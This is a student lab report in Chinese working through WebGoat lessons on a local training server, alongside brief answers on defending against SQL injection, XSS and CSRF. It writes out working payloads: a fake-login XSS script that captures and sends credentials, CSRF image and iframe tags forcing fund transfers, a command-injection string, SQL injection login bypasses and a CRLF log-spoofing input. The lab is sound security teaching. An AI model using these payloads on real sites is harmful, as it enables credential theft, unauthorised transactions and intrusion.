2018-2019-2 网络对抗技术 20165235 Exp 9 Web安全基础

实验任务

本实践的目标理解经常使用网络攻击技术的基本原理，作很多于7个题目，共3.5分。包括(SQL,XSS,CSRF)。Webgoat实践下相关实验。

基础问题回答

• （1）SQL注入攻击原理，如何防护
• 1.对漏洞注入点相关代码进行处理，筛除特殊字符,以规范代码安全性；2.关闭或删除没必要要的交互式提交表单页面；3.普通用户与系统管理员用户的权限要有严格的区分;4.不要在服务器端放置备份的文件以避免受到感染，或备份的文件含有漏洞，形成切入点。
• （2）XSS攻击的原理，如何防护
• 1.特征匹配方式，在全部提交的信息中都进行匹配检查，通常会对“javascript”这个关键字进行检索，一旦发现提交信息中包含“javascript”，就认定为XSS攻击。2.对全部用户提交内容进行可靠的输入验证，包括对URL、查询关键字、HTTP头、POST数据等，仅接受指定长度范围内、采用适当格式、采用所预期的字符的内容提交，对其余的一概过滤。3.实现Session标记、CAPTCHA系统或者HTTP引用头检查，以防功能被第三方网站所执行
• （3）CSRF攻击原理，如何防护

• 1.尽可能不要在页面的连接中暴露用户隐私信息，对于用户修改删除等操做最好都使用post操做。2.经过referer、token或者验证码来检测用户提交。3.避免全站通用的cookie，严格设置cookie的域。

  实验过程

  WebGoat准备

• 下载webgoat-container-7.0.1-war-exec.jar文件。在该文件目录下使用命令java -jar webgoat-container-7.0.1-war-exec.jar运行Webgoat。
  

• 在浏览器中输入http://localhost:8080/WebGoat进入WebGoat登陆界面,直接用默认用户名密码guest登陆便可
  

  XSS攻击

  Phishing with XSS

• 在webgoat找到Cross-Site Scripting （xss）攻击打开第一个——Phishing with XSS。将下面这段代码输入到Search:输入框中，点击search

<head> <body> <div> <div style="float:left;height:100px;width:50%;background-color:yellow;"></div> <div style="float:left;height:100px;width:50%;background-color:orange;"></div> </div> <div style="background-color:grey;height:200px;clear:both;"></div>   </div></div> </form>   <script> function hack(){  XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("attack.！！！！！！ Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); }    </script> <form name="phish"> <br> <br> <HR>   <H2>This feature requires account login:</H2> <br>   <br>Enter Username:<br>   <input type="text" name="user">   <br>Enter Password:<br>   <input type="password" name = "pass"> <br>   <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR> </body> </head>

• 结果会出现代码中所指定的黄、橙、灰三块
  

• 在登陆框中输入用户名20165235，密码20165235，点击登陆后，显示被窃取的用户名和密码。
  

  Stored XSS Attacks

• 打开Cross-Site Scripting （xss）攻击中的第二个：Stored XSS Attacks。在Message框中输入代码,Title为20165235test，并点击submit。

<head> <body> <div> <div style="float:left;height:100px;width:50%;background-color:yellow;"></div> <div style="float:left;height:100px;width:50%;background-color:orange;"></div> </div> <div style="background-color:grey;height:200px;clear:both;"></div>   </div></div> </form>   <script> function hack(){  XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("attack.！！！！！！ Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); }    </script> <form name="phish"> <br> <br> <HR>   <H2>This feature requires account login:</H2> <br>   <br>Enter Username:<br>   <input type="text" name="user">   <br>Enter Password:<br>   <input type="password" name = "pass"> <br>   <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR> </body> </head>

• 提交后，点击下方新增的连接
  

• 注入成功，messege部分显示的是三色框，在下方输入用户名20165235，密码20165235，点击提交后，成功获取用户名和密码。
  

  Reflected XSS Attacks

• 开xss的第三个攻击Reflected XSS Attacks在“Enter your three digit access code:”中输入`<script>alert("20165235test");</script>`

  CSRF攻击

• 打开Cross-Site Scripting （xss）攻击中的第四个：Cross Site Request Forgery(CSRF)。查看页面Parameters中的src和menu值，分别为314和900.在message框中输入<img src="http://localhost:8080/WebGoat/attack?Screen=314&menu=900&transferFunds=5000" width="1" height="1" />点击Submit提交。

• 在下面中生成以Title命名的消息20165235test。点击该连接，当前页面就会下载这个消息并显示出来，从而达到CSRF攻击的目的。
  

  CSRF Prompt By-Pass

• 打开Cross-Site Scripting （xss）攻击中的第五个：CSRF Prompt By-Pass同攻击4，查看页面Parameters中的src和menu值，分别为327和900.
• message框中输入代码

<iframe src="attack?Screen=327&menu=900&transferFunds=6000"> </iframe>
<iframe src="attack?Screen=327&menu=900&transferFunds=CONFIRM"> </iframe>

• 在Message List中生成连接"20165235test"。点击连接，攻击成功：
  

  SQL注入攻击

  Command Injection 命令注入

• 选择Injection Flaws中的第一项Command Injection，而后右键点击页面，选择inspect Element审查网页元素对源代码进行修改，在复选框中任意一栏的代码后添加"& netstat -an & ipconfig"。
  

• 点击view，能看到网络端口使用状况和 IP 地址，攻击成功。
  

  Numeric SQL Injection

• 选择Injection Flaws中的第二项Numeric SQL Injection，右键点击页面，选择inspect Element审查网页元素对源代码进行修改，在选中的城市编号Value值中添加or 1=1。
  

• 攻击成功，显示全部城市的天气状况
  

  String SQL Injection 字符串型注入

• 选择Injection Flaws中的第四项String SQL Injection，输入查询的用户名' or '1'='1,'1'='1'是永真式，全部的用户信息将会被输出
  

  Log Spoofing

• 在文本框中输入用户名qiying%0d%0aLogin Succeeded for username: admin
  

  LAB:SQL Injection

• 选择Injection Flaws中的第五项LAB:SQL Injection，右键点击页面，选择inspect Element审查网页元素对源代码进行修改，将密码最大长度maxlength改成100
  

• 在密码框输入' or 1=1 --，成功登录，攻击成功。
  

  实践总结与体会

  此次实验主要是利用WebGoat工具，进行SQL注入攻击、XSS攻击、CSRF攻击。攻击原理主要是利用一些语句漏洞，经过修改这些语句进行攻击。实验使我对SQL语句等相关知识有了进一步的理解,对网络攻防的内容也有一些兴趣，虽然不少方面作的仍是有所不足，可是仍然收获颇丰